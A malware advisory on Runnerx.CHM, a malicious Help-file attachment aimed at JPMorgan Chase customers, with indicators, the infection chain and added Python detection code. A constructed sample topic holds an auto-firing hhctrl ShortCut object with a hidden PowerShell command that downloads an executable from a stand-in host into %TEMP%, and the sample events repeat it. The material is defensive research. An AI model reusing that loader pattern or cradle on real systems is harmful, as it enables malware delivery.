Runnerx.CHM, a Microsoft Help file malware, targets JPMorgan Chase customers.
The Dell SonicWALL Threats Research team has observed reports of a malware family, detected as GAV: Runnerx.CHM (Trojan), targeting global financial services firms, specifically JPMorgan Chase customers, in the wild. This time the attackers used a Microsoft Compiled HTML Help (.chm) file attached to spam messages. A Microsoft Help file is a binary container that packages a set of HTML files (and their scripts) into a single archive.

The spam arrives via email posing as coming from JPMorgan Chase, with the subject "Chase Bank".
Here is an example:

Infection Cycle:
The malware uses the following icons:

MD5s:
- 14b166abd7279baa483cfc6e33fc5a3e - Email attachment (Message.CHM)
- e821100cd69a0902d6ac5b1e56874692 - Executable dropper (test.exe)
- 72841b43391206f983b0fa2ea0be331a - Executable dropper (p2804us77.exe)
The malware adds the following files to the system:
- Message.CHM
- %TEMP%\natmasla2.exe - detected as GAV: Runnerxd1.CHM (Trojan)

The malware uses Microsoft Help file scripting to drop malicious files on the target system, such as the following:

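Two checks follow from the description above: recognising a CHM attachment by its ITSF container header rather than by its file extension, and scanning the HTML topics decompiled from it (for example with `hh.exe -decompile <dir> Message.CHM`, or by extracting it with 7-Zip) for the HTML Help ActiveX control's "ShortCut" command, which is the usual way a CHM topic is made to launch a program when it is displayed. The following is an added example and is not SonicWall's code; the page's screenshot of this sample's script is not reproduced here, so the header bytes and the topic HTML below are constructed, and the PowerShell command line inside the sample topic is an assumed illustration of the described behaviour, not a transcription of the sample's actual script.

```python
"""CHM attachment triage (added example; header bytes and topic HTML are constructed)."""
import html
import re
import struct
import uuid
from typing import Dict, List, Optional

ITSF_MAGIC = b"ITSF"
# Fixed GUIDs that a genuine ITSF (CHM) header carries at offsets 24 and 40.
ITSF_GUID_1 = uuid.UUID("7C01FD10-7BAA-11D0-9E0C-00A0C922E6EC")
ITSF_GUID_2 = uuid.UUID("7C01FD11-7BAA-11D0-9E0C-00A0C922E6EC")
# CLSID of the HTML Help ActiveX control (hhctrl.ocx).
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"


def parse_itsf_header(data: bytes) -> Optional[Dict]:
    """Return the ITSF header fields, or None if `data` does not start with one."""
    if len(data) < 0x60 or data[:4] != ITSF_MAGIC:
        return None
    # Offsets 4..24: version, header length, unknown (1), timestamp, Windows LANGID.
    version, header_len, _unknown, timestamp, lang_id = struct.unpack_from("<IIIII", data, 4)
    guid1 = uuid.UUID(bytes_le=data[24:40])  # GUIDs are stored little-endian
    guid2 = uuid.UUID(bytes_le=data[40:56])
    # Offset 56: two (offset, length) pairs describing the header sections.
    s0_off, s0_len, s1_off, s1_len = struct.unpack_from("<QQQQ", data, 56)
    # Offset 88 (version 3 only): absolute file offset of the content section.
    content_off = struct.unpack_from("<Q", data, 88)[0] if version >= 3 else None
    return {
        "version": version,
        "header_length": header_len,
        "timestamp": timestamp,
        "language_id": lang_id,
        "guid_ok": guid1 == ITSF_GUID_1 and guid2 == ITSF_GUID_2,
        "sections": [(s0_off, s0_len), (s1_off, s1_len)],
        "content_offset": content_off,
    }


def is_chm(data: bytes) -> bool:
    """Gateway-style check: is this really a CHM, whatever the attachment is named?"""
    hdr = parse_itsf_header(data)
    return hdr is not None and hdr["guid_ok"]


OBJECT_RE = re.compile(r"<object\b([^>]*)>(.*?)</object>", re.I | re.S)
PARAM_RE = re.compile(r'<param\s+name\s*=\s*"([^"]+)"\s+value\s*=\s*"([^"]*)"', re.I)
ID_RE = re.compile(r'\bid\s*=\s*"([^"]+)"', re.I)


def find_shortcut_objects(topic_html: str) -> List[Dict]:
    """Return every hhctrl ShortCut object in a decompiled topic, with the program it launches."""
    hits = []
    for m in OBJECT_RE.finditer(topic_html):
        attrs, body = m.group(1), m.group(2)
        if HHCTRL_CLSID not in attrs.lower():
            continue
        params = {n.lower(): html.unescape(v) for n, v in PARAM_RE.findall(body)}
        if params.get("command", "").lower() != "shortcut":
            continue
        # Item1 is "<window class>,<program>,<arguments>"; the first field is usually empty.
        fields = [f.strip() for f in params.get("item1", "").split(",", 2)]
        id_match = ID_RE.search(attrs)
        obj_id = id_match.group(1) if id_match else ""
        # A topic that calls <id>.Click() from script fires the shortcut with no user action.
        auto = bool(obj_id and re.search(r"\b%s\s*\.\s*click\s*\(" % re.escape(obj_id), topic_html, re.I))
        hits.append({
            "id": obj_id,
            "program": fields[1] if len(fields) > 1 else "",
            "arguments": fields[2] if len(fields) > 2 else "",
            "auto_click": auto,
        })
    return hits


# Constructed sample: a version-3 ITSF header (0x60 bytes) carrying the two fixed GUIDs.
SAMPLE_CHM_HEADER = (
    b"ITSF"
    + struct.pack("<IIIII", 3, 0x60, 1, 0x5548F0C0, 0x0409)
    + ITSF_GUID_1.bytes_le + ITSF_GUID_2.bytes_le
    + struct.pack("<QQQQ", 0x60, 0x18, 0x78, 0x1FE2)
    + struct.pack("<Q", 0x205A)
)

# Constructed sample topic: a 1x1 hhctrl ShortCut object fired from script. The command
# line is an assumed illustration (PowerShell fetching a dropper into %TEMP%), not the
# sample's actual script.
SAMPLE_TOPIC_HTML = r"""<html><body>
<h1>Chase Bank</h1>
<object id="x" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width="1" height="1">
  <param name="Command" value="ShortCut">
  <param name="Button" value="Bitmap::shortcut">
  <param name="Item1" value=",cmd.exe,/c powershell -w hidden -c &quot;(New-Object Net.WebClient).DownloadFile('http://example.invalid/test.exe','%TEMP%\natmasla2.exe')&quot;">
  <param name="Item2" value="273,1,1">
</object>
<script>x.Click();</script>
</body></html>"""

if __name__ == "__main__":
    print("ITSF header:", parse_itsf_header(SAMPLE_CHM_HEADER))
    for hit in find_shortcut_objects(SAMPLE_TOPIC_HTML):
        print("ShortCut object:", hit)
```

The topic scan has to run on decompiled HTML because the topics inside a CHM are normally LZX-compressed, so grepping the raw .chm for the CLSID will miss them; the header check, by contrast, works on the raw attachment bytes.
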
Once the computer is compromised, the target user sees a fake message purporting to come from JPMorgan.

But in the background the malware runs the following commands on the system:

The file natmasla2.exe is dropped after the malware launches on the target system. The malware uses Powershell.exe (Windows PowerShell) to download the droppers from the C&C server, and then injects into Svchost.exe to collect information from the target system.

Once Powershell.exe has been launched successfully on the target system, it drops natmasla2.exe into the Temp folder.
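
The chain described in the paragraphs above (the Help viewer launching a shell, PowerShell downloading a dropper and writing natmasla2.exe into the Temp folder, and the later injection into svchost.exe) maps onto a few host-based detections. The following is an added example, not SonicWall's code: it runs those rules over a constructed set of Sysmon-style process-creation (Event ID 1), file-creation (Event ID 11) and CreateRemoteThread (Event ID 8) events. The field names follow Sysmon's, but the events, GUIDs, paths and command lines are made up for the example, and the download cradle in them is an assumption about how the PowerShell stage is launched, not a transcription of the sample's commands.

```python
"""Host-based detection for the CHM -> PowerShell -> dropper chain (added example; events are constructed)."""
import ntpath
import re
from typing import Dict, Iterator, List, Tuple

SHELLS = {"cmd.exe", "powershell.exe"}
# Common PowerShell download primitives; a strong signal when the parent chain starts at hh.exe.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|net\.webclient|invoke-webrequest|\biwr\b|bitsadmin|start-bitstransfer",
    re.I)
TEMP_RE = re.compile(r"\\appdata\\local\\temp\\", re.I)
EXE_RE = re.compile(r"\.(exe|dll|scr)$", re.I)

Alert = Tuple[str, str, str]  # (rule name, process GUID, detail)


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def detect(events: List[Dict]) -> List[Alert]:
    """Apply the four rules to a list of Sysmon-style events and return the alerts raised."""
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}

    def ancestors(guid: str) -> Iterator[str]:
        """Walk ParentProcessGuid links, yielding each ancestor's image name (loop-safe)."""
        seen = {guid}
        p = procs.get(guid)
        while p is not None:
            parent = p.get("ParentProcessGuid")
            if parent not in procs or parent in seen:
                break
            seen.add(parent)
            p = procs[parent]
            yield basename(p["Image"])

    # Executables that powershell.exe wrote under %TEMP% (Event ID 11).
    dropped = {
        e["TargetFilename"].lower()
        for e in events
        if e["EventID"] == 11 and basename(e["Image"]) == "powershell.exe"
        and TEMP_RE.search(e["TargetFilename"]) and EXE_RE.search(e["TargetFilename"])
    }

    alerts: List[Alert] = []
    for e in events:
        if e["EventID"] == 1:
            img = basename(e["Image"])
            # Rule 1: the Help viewer (hh.exe) is an ancestor of a shell, directly or via cmd.exe.
            if img in SHELLS and "hh.exe" in ancestors(e["ProcessGuid"]):
                alerts.append(("CHM_SPAWNS_SHELL", e["ProcessGuid"], e["CommandLine"]))
            # Rule 2: PowerShell command line carries a download primitive.
            if img == "powershell.exe" and DOWNLOAD_RE.search(e["CommandLine"]):
                alerts.append(("PS_DOWNLOAD_CRADLE", e["ProcessGuid"], e["CommandLine"]))
            # Rule 3: an executable PowerShell dropped into %TEMP% is now running.
            if e["Image"].lower() in dropped:
                alerts.append(("PS_DROPPED_EXE_RUN", e["ProcessGuid"], e["Image"]))
        elif e["EventID"] == 8:
            # Rule 4: PowerShell or the dropped binary creates a remote thread in svchost.exe.
            src = e["SourceImage"]
            if basename(e["TargetImage"]) == "svchost.exe" and (
                    basename(src) == "powershell.exe" or src.lower() in dropped):
                alerts.append(("INJECT_INTO_SVCHOST", e["SourceProcessGuid"], src))
    return alerts


# Constructed sample events (GUIDs shortened to letters for readability).
TEMP = r"C:\Users\victim\AppData\Local\Temp"
DROPPER = TEMP + r"\natmasla2.exe"
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "A", "ParentProcessGuid": "MAIL", "Image": r"C:\Windows\hh.exe",
     "CommandLine": r'"C:\Windows\hh.exe" ' + TEMP + r"\Message.CHM"},
    {"EventID": 1, "ProcessGuid": "B", "ParentProcessGuid": "A", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -w hidden -c ..."},
    {"EventID": 1, "ProcessGuid": "C", "ParentProcessGuid": "B", "Image": PS_IMAGE,
     "CommandLine": r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/test.exe','"
                    + DROPPER + "')"},
    {"EventID": 11, "ProcessGuid": "C", "Image": PS_IMAGE, "TargetFilename": DROPPER},
    {"EventID": 1, "ProcessGuid": "D", "ParentProcessGuid": "C", "Image": DROPPER, "CommandLine": DROPPER},
    {"EventID": 8, "SourceProcessGuid": "D", "SourceImage": DROPPER,
     "TargetProcessGuid": "S", "TargetImage": r"C:\Windows\System32\svchost.exe"},
    # Benign PowerShell use from Explorer: must raise nothing.
    {"EventID": 1, "ProcessGuid": "E", "ParentProcessGuid": "EXPLORER", "Image": PS_IMAGE,
     "CommandLine": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for rule, guid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:20} pid-guid={guid:3} {detail}")
```

Rule 1 walks the full parent chain rather than checking only the immediate parent, so hh.exe -> cmd.exe -> powershell.exe is caught even though hh.exe is not PowerShell's direct parent; the chain walk records visited GUIDs so a malformed or recycled parent reference cannot loop it.
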

After a while, the malware generates a dummy URL to download Flash Player from the Adobe website.

It then downloads a second dropper, detected as GAV: Runnerxd2.CHM (Trojan), which is a variant of the Dyre banking Trojan:
- 72841b43391206f983b0fa2ea0be331a - Executable dropper (p2804us77.exe)

Dyre has previously been built to target specific banks such as Bank of America and Citibank. Dyre injects malicious code into web browsers, ready to steal information when victims visit their banking site. We recently published reports on Dyre.E, Dyre.F and Dyre.L.
Command and Control (C&C) Traffic
Runnerx.CHM performs its C&C communication over HTTP. The malware tries to download the droppers from the C&C server; here are some examples:


SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:
- GAV: Runnerx.CHM (Trojan)
- GAV: Runnerxd1.CHM (Trojan)
- GAV: Runnerxd2.CHM (Trojan)